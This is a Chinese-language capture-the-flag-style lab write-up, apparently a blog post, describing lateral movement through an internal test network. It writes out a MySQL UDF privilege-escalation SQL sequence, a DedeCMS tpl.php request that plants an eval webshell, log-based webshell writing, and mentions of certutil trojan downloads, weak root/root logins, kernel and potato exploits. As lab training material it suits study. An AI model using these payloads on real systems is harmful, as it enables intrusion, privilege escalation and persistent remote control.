初级靶场
书接上回(入门靶场)
192.168.77.33成为了入口
入口信息收集
由于之前获取了77.33的管理员权限,可以直接登录系统。
查看存在的网卡,发现除了入门靶场的77段网卡以外还有两块网卡

那不直接扫他
10段的有1台机器

192.168.99段有四台机器,看着web服务感觉192.168.99.5和10.1.1.133是同一台机器。

全端口扫描了一下99段,又扫出来一些东西

10段机器
10.1.1.133=192.168.99.5
看了一下这两个段的端口,感觉10.1.1.133=192.168.99.5

但是存在ms17010,可以尝试一下

打了一波ms17010,没打动,寄
还有个数据库弱口令,root/root连接成功

使用udf提权
需要获取到udf提权的dll文件,sqlmap提供了现成的dll文件,在sqlmap\data\udf\mysql目录下,选择相应的系统版本和MySQL位数的文件。
由于文件被异或编码存放的,还需要进行解码,解码文件在sqlmap\extra\cloak目录下。
py -2 .\cloak.py -d -i H:\st\sqlmap\udf\mysql\windows\64\lib_mysqludf_sys.dll_



select @@plugin_dir; //查找mysql目录
create table mysql.b(cmd LONGBLOB); //创建表
insert into mysql.b(cmd) values (hex(load_file('C:\HW-tools\综合扫描\漏扫工具\sqlmap\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll')));//将dll文件中的内容hex编码放入表中
SELECT unhex(cmd) FROM mysql.b INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin/uu.dll';//将表中内容写入到指定文件中
create function sys_eval returns string soname 'uu.dll'; //使用sys_eval函数命令执行
select sys_eval('whoami');

尝试添加用户,发现可以添加用户但是不能给他管理员权限
我直接改他管理员密码
然后就登上来了,嗯,360纯纯摆设,一点反应都没有。

而且还出网~
正式环境这么做可能被管理员都发现了,下面才是正儿八经的动作
利用certutil命令下载木马文件

直接执行这个木马
嘎嘎上线(这里ip变成137了是因为他是个动态ip)

192.168.99段
192.168.99.15
爆目录不知道嘛回事爆不出来,搞了个插件检测到是php解析的

盲猜phpstudy搭建的,试了一下phpstudy常见的目录

phpmyadmin也存在

root/root弱口令噶就登进去了~

尝试通过命令写入shell,使用show global variables like "secure%"
擦,没有权限

尝试通过日志写入shell,使用select @@datadir获取绝对路径


淦,死活解析不了,看看备份路径SHOW VARIABLES LIKE 'general%';

看了一下特喵的貌似是斜杠搞反了,被转义了,-_-||
重新执行,哎,这不就好起来了吗!

随便执行个小马,让它保存在日志中


人麻了,蚁剑和哥斯拉死活连不上,重来一遍试试


咱也不知道为啥,这次就好了

一顿执行命令,得出结论
- 是system权限
- 一个网卡不出网,只能通入口那台机器
- 有杀软

那就想办法搞个中转免杀喽
嗯,先试了一下没免杀的,也就直接上线了,那就不用费劲搞免杀了。嘿嘿。。。

192.168.99.7
一个织梦的站

还有个phpstudy探针(全端口扫出来的)

phpstudy探针尝试弱口令连接mysql失败
查看robots.txt获取目录,找到登录界面


爆破目录发现有备份文件

发现是备份的数据库数据,里面存在管理员的账户和md5值


直接给他登录

准备通过文件管理器上传一个马子,结果那个插件被删了,emmm~
只能文件上传了,嘎嘎找地方上传,我特么上传个正儿八经的图片都说我

哎,再找找别的地方
利用sys_verifies后台文件写入获取getshell,这貌似是个文件包含的洞

必须加上action=down参数才能解析

切换成get参数执行系统命令


windows的转义字符为^ 使用echo写入webshell

这个方法太鸡肋了,目标机器还不出网,用echo命令写个新的webshell又碰壁,难受~
又找了个后台文件上传的洞
DEDEC CMS v5.7 文件上传_小生迷途知返的博客-CSDN博客_dedecms文件上传


文件上传:
http://192.168.99.7/dedeadmin/tpl.php?filename=np666.lib.php&action=savetagfile&content=%3C?php%20phpinfo();@eval($_POST[%22cmd%22]);?%3E&token=c12bf4a8330732e9f45a492d54399803
webshell地址:
http://192.168.99.7/include/taglib/np666.lib.php

通过webshell上传一个cs马,直接执行上线

这个权限属实有点低,老办法针对2008R2服务器使用烂土豆提权。。。
这次啥土豆都不管用了,试了一圈洞都不行事
疯狂问度娘,看见一个CVE-2014-4113内核溢出漏洞
参考链接:
111.网络安全渗透测试-[权限提升篇9]-[Windows 2008 R2内核溢出提权]
还有github的poc地址
Kernelhub/CVE-2014-4113 at master · Ascotbe/Kernelhub

一键提权就是爽~!
192.168.99.3

扫描目录扫到一个数据库文件

下载后打开


直接登录

上传图片马

上传后会返回位置

在数据库备份的地方

对上传的图片进行备份


直接访问这个链接

哥斯拉连接马子

asp的权限太低,上传一个aspx的马子

权限还是低,但是可以执行命令了

使用iis6提权工具进行提权

顶,然后执行各种命令,发现这台机器不出网,貌似也没杀软
尝试上线,结果死活不上线,而且弄着弄着特喵的不解析aspx了,寄。


